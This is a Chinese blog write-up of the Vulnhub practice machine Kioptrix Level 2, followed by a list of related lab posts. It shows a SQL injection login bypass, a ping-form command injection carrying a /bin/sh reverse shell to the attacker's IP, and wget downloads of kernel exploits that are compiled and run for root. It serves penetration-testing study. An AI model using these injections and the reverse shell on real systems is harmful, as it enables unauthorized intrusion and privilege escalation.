靶机Kioptrix Level 2攻略

最新推荐文章于 2025-05-24 20:53:44 发布
最新推荐文章于 2025-05-24 20:53:44 发布
阅读量436 收藏 1
点赞数 8
分类专栏: # ocsp学习笔记 文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73863497/article/details/144358971
版权

获取靶机IP地址

打开kail虚拟机,使用arp-scan扫描工具

arp-scan -l
export ip=192.168.159.137

启动靶机后再次扫描当前局域网下的IP地址 192.168.159.137就是我们需要的IP地址,使用export定义临时环境变量(仅在当前终端会话中有效)

export ip=192.168.159.137

变量方便后面使用,可以使用echo $ip验证

先访问网址看下什么样子

发现是一个登录页面,使用SQL注入试一下,输入

admin ' and 1=1 -- +

成功进入

查看页面源码

发现,这个页面的html语句有错误,修改错误后刷新页面

<html>
<body>

<!-- Start of HTML when logged in as Administator -->
	<form name="ping" action="pingit.php" method="post" target="_blank">
		<table width='600' border='1'>
		<tr valign='middle'>
			<td colspan='2' align='center'>
			<b>Welcome to the Basic Administrative Web Console<br></b>
			</td>
		</tr>
		<tr valign='middle'>
			<td align='center'>
				Ping a Machine on the Network:
			</td>
				<td align='center'>
				<input type="text" name="ip" size="30">
				<input type="submit" value="submit" name="submit">
			</td>
			</td>
		</tr>
	</table>
	</form>


</body>
</html>

发现可以反弹shell,利用插件Hack-tools获取反弹shell语句

127.0.0.1 | /bin/sh -i >& /dev/tcp/192.168.159.135/8888 0>&1

同时,kail监听8888端口

成功

进入靶机里面搜集一些信息

通过信息收集获取exp信息,1397.c

通过kail上传exp文件,kail使用python脚本发现权限不够

python -m http.server
wget http://192.168.159.135:8000/1397.c

接下来使用python搭建交互式终端

python -c "import pty;pty.spawn('/bin/bash');"

切换到tmp目录,因为tmp目录默认情况下是具有读写修权限

cd /tmp

 再次使用wget工具下载

wget http://192.168.159.135:8000/1397.c

编译运行exp文件

gcc -o 13exp 1397.c
ls
./13exp

这个内核不是漏洞,需要重新找,考虑lsb,发现exp文件9542.c

wget http://192.168.159.135:8000/9542.c
gcc -o 95exp 9542.c
./95exp

whoami,root 提权成功,可以使用命令更改密码

sudo passwd root

 

Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 952
Kioptrix Level 2靶机wp
Vulnhub靶机Kioptrix_Level1.3
qq_48904485的博客
03-17 586
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
Kioptrix Level 2
2303_76157831的博客
03-31 159
admin后的 ' 使原来的代码中的单引号进行闭合,再拼接 or '1'='1 达到万能密码的作用,“or”代表只要有一个条件为真整个语句就为真 ,我们在“or”后面构造 '1'='1 ,这样即使我们并不知道账号密码,但是“or”后方的 '1'='1 等式恒成立,(因为我们输入的账号为 admin' 已经提前手动闭合 ,所以,在代码中显示的完整版为 'admin' or '1'='1' )
Vulnhub靶机Kioptrix Level 2 writeup
xingjinhao123的博客
01-09 1270
Vulnhub靶机Kioptrix Level 2渗透
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 309
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
vulnhub 靶机 Kioptrix Level 1渗透笔记
weixin_52268949的博客
03-03 5571
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 192.168.101.0/24 扫描开放端口 nmap -A -p- 192.168.101.20 这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本 msfconsole msf6 > use auxiliary/scanner/smb/smb_version
《攻克Kioptrix Level 2:OSCP靶机渗透与提权分析》
Xs_20240309的博客
12-10 1309
打开网页,F12,找到原网页源代码Ping a Machine on the Network 右击以html格式修改,将上述代码复制,并将。根据上图版本信息,直接下载33321.c,发现33321.c编译有问题,换到1397.c,下载完编译还是报错,有问题,这条路走不通了。但是这也没啥提示啊,看一波源码是不是有泄露的地方,这里有地方没有闭合,上面代码有传参点会将输入的内容传到。先用arp扫一下,等待靶机开机后,在扫一下,确定192.168.17.177是靶机IP。获取到靶机的ip后,开始对ip的扫描。
Kioptrix Level 1通关攻略
m0_73863497的博客
12-08 2282
执行了./470 | grep "1.3.20"命令,先是运行当前目录下的470文件(其功能未知),再通过grep工具筛选出包含 “1.3.20” 的输出行,展示的结果是不同操作系统环境下使用apache-1.3.20版本的相关配置情况,各系统以编号加对应描述形式呈现。注意这里的ip地址输入的是自己虚拟机的ip地址,目的是从虚拟机里上传到靶机中,使用 ip a 查看自己的虚拟机IP地址。对端口进行指纹探测,我们nmap探测的都是端口的默认服务(不一定它的端口就是使用的默认服务)
Vulnhub靶机Kioptrix_Level1.1
qq_48904485的博客
03-13 571
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.1(192.168.56.104)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 1191
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 605
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
为什么服务器突然变慢?从硬件到软件的排查方法
2409_89014517的博客
05-21 561
为什么服务器突然变慢?从硬件到软件的排查方法
wordpress上传图片时出现服务器无法处理图片
jianzhanyes的博客
05-23 395
检查服务器配置:如果是使用 Nginx,可在 nginx.conf 文件中添加 client_max_body_size 64M;压缩图片文件:在上传前使用图片压缩工具(如 TinyPNG)优化图片大小,控制图片宽度在 2500px 以内。检查文件夹权限:确保 /wp-content/uploads/ 目录的权限为 755,文件权限为 644。upload_max_filesize 和 post_max_size 设置为 64M 或更高。等待并重试:有时服务器繁忙是暂时的,等待几分钟后重新上传图片。
A服务器备份rabbitmq持久化目录到B服务器,不显示mq队列消息
Awesome_py的博客
05-23 476
在A服务器上通过Docker启动RabbitMQ服务后,恢复服务时发现队列消息丢失。问题解决步骤如下:首先,备份持久化文件并压缩发送到备用服务器。接着,在新服务器上解压文件并启动MQ服务,但发现队列消息未显示。通过检查发现,需要备份并同步原服务器的hostname和.erlang.cookie文件,以确保持久化消息能被识别。修改docker-compose.yml文件,添加hostname和RABBITMQ_ERLANG_COOKIE配置后,重新启动服务,队列消息成功恢复。
基于服务器的 DPI 深度分析解决方案
ZohoITOM的博客
05-20 1296
NetFlow Analyzer 通过 DPI 技术与流分析的深度融合,构建了 “精准采集 - 智能分析 - 主动运维” 的闭环管理体系,为企业关键服务器提供兼具成本效益与技术深度的流量监控方案。
服务器磁盘按阵列划分为哪几类
jiedaodezhuti的博客
05-22 487
当前技术趋势显示,RAID 10与RAID 6已成为企业级存储的主流选择,而传统RAID 2/3/4因架构缺陷逐渐退出市场。‌工作机制‌:数据与校验信息交替存储于不同磁盘,允许单盘故障恢复。‌复合架构‌:先做RAID1镜像,再对镜像组进行RAID0条带化。‌容量优先‌:RAID 5 > RAID 6 > JBOD(无冗余)‌可靠性优先‌:RAID 10 ≈ RAID 6 > RAID 1。‌技术升级‌:引入第二份校验数据,可容忍双盘失效。‌性能优先‌:RAID 0 > RAID 10 > RAID 5。
MCP专题 | 探索MCP服务器世界:增强AI能力的精选推荐
GentelAi的博客
05-20 852
MCP是一种开放协议,旨在让AI模型(如Claude)通过标准化的服务器实现与本地或远程资源的安全交互。它支持AI执行复杂任务,例如访问文件系统、查询数据库或调用网络API,同时保持安全性和可控性。MCP服务器的多样性使其适用于从开发到金融、安全等多个领域。MCP服务器为AI模型提供了无限可能,从云端服务到金融数据、安全分析,涵盖了多种应用场景。更多其他工具和集成、框架、实用工具、提示和技巧等信息,详见仓库,快速提升AI能力。立即探索完整列表,找到最适合您的MCP服务器,开启更智能的AI应用之旅!
服务器硬盘虚拟卷的处理
最新发布
weixin_51552032的博客
05-24 217
目前的情况是需要删除逻辑卷,然后再重新来弄一遍。数据已经备份好了,所以不用担心数据会丢失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

君惜竹⁡⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值